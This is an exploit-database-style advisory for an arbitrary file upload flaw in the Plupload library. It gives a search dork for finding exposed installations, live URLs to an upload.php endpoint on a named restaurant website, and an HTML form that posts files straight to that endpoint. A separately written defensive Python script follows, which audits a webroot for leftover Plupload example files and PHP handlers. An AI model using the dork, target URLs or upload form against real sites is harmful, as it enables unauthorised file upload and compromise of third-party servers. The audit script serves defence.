
Media Vendor Plupload - Arbitrary File Upload

Author: Rednofozi, Published: 27-08-2018
########################################## 
# Exploit Title : Media Vendor Plupload - Arbitrary File Upload
# Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:com
# Date : 2018
# Exploit Author: Rednofozi
# Category: Webapps
# Language: PHP
# Tested on: Windows 10 / Firefox


Info : ______________________________________________________________________

#view : https://www.kemosabesushi.com/files/wp-includes/js/plupload/bower.json
#Test Upload : https://www.kemosabesushi.com/files/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php

Vendor source :

{
  "name": "plupload",
  "license": "AGPLv3",
  "authors": [
    "Davit Barbakadze <davit.barbakadze@ephox.com>"
  ],
  "homepage": "http://plupload.com",
  "repository": {
    "type": "git",
    "url": "https://github.com/moxiecode/plupload.git"
  },
  "main": [
    "./js/plupload.full.min.js"
  ],
  "ignore": [
    "tests/",
    "src/",
    "build/",
    "examples/",
    "Jakefile.js",
    "package.json",
    "bower.json",
    "composer.json",
    "README.md",
    ".*"
  ]
}
______________________________________________________________________
#Tools :

<!DOCTYPE html>
<html>
<body>

<form action="https://www.kemosabesushi.com/files/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data">

<input type="file" name="file" id="file">
<input type="submit" value="Upload" name="submit">
</form>

</body>
</html>
______________________________________________________________________

# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
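
The vendor manifest above lists examples/ (the directory holding upload.php) among the paths excluded from distribution, yet both are reachable on the affected site. As an added defensive example, not part of the original advisory or the Plupload project, this Python script walks a local webroot, finds every bower.json naming plupload, and reports files from its "ignore" list plus any PHP script that was deployed with the library. The function names and the sample tree are constructed for illustration.

```python
import json
import sys
import tempfile
from pathlib import Path


def audit_plupload(webroot):
    """Return sorted (kind, relative_path) findings for plupload copies under webroot.

    "dev-file": matches the manifest's own "ignore" list; "php-handler": PHP script.
    """
    root = Path(webroot)
    findings = set()
    for manifest in root.rglob("bower.json"):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8", errors="replace"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest
        if not isinstance(meta, dict) or meta.get("name") != "plupload":
            continue
        base = manifest.parent
        ignore = meta.get("ignore")
        for pattern in ignore if isinstance(ignore, list) else []:
            if not isinstance(pattern, str) or not pattern.strip("/"):
                continue
            for hit in base.glob(pattern.strip("/")):
                findings.add(("dev-file", hit.relative_to(root).as_posix()))
        for script in base.rglob("*.php"):
            findings.add(("php-handler", script.relative_to(root).as_posix()))
    return sorted(findings)


def build_sample(root):
    """Constructed sample tree using the directory layout from the advisory."""
    lib = Path(root) / "files/wp-includes/js/plupload"
    (lib / "examples").mkdir(parents=True)
    manifest = {"name": "plupload", "ignore": ["tests/", "examples/", "bower.json", ".*"]}
    (lib / "bower.json").write_text(json.dumps(manifest))
    (lib / "examples" / "upload.php").write_text("<?php // placeholder, constructed\n")


if __name__ == "__main__":
    # With an argument: audit that webroot. Without: audit the constructed sample.
    with tempfile.TemporaryDirectory() as tmp:
        target = sys.argv[1] if len(sys.argv) > 1 else tmp
        if target == tmp:
            build_sample(tmp)
        for kind, path in audit_plupload(target):
            print(f"{kind}\t{path}")
```

Any "php-handler" finding inside a JavaScript library directory should be removed from the deployed tree or blocked at the web server.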